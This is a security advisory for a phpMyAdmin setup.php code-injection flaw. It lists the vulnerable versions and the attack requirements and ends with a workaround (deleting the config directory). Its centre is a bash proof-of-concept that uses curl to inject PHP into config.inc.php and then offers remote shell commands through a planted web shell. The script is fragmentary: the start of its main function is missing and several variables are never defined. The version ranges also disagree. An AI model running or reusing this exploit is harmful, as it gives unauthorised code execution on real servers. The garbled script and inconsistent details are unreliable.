This vuln can only be exploited against environments where the administrator has chosen to install phpMyAdmin following the *wizard* method, rather than manual method.
Vulnerable Systems:
* phpMyAdmin version 2.11.9.4 and prior
* phpMyAdmin version 3.0.1.1and prior
Attack requirements:
1) Vulnerable version (obviously!): 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 according to PMASA-2009-3
2) It *seems* this vuln can only be exploited against environments where the administrator has chosen to install phpMyAdmin following the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
3) Administrator must have NOT deleted the '/config/' directory within the '/phpMyAdmin/' directory. this is because this directory is where '/scripts/setup.php' tries to create 'config.inc.php' which is where PHP code is injected
Proof of concept:
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi
if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit
fi
if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit
fi
}
# end of exploit function
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
length=`echo -n $token | wc -c`
# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit $token $cookiejar $1
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit
fi
Workaround:
Delete the '/config/' directory within the '/phpMyAdmin/' directory. This is because this directory is where '/scripts/setup.php' tries to create 'config.inc.php' which is where code is injected.
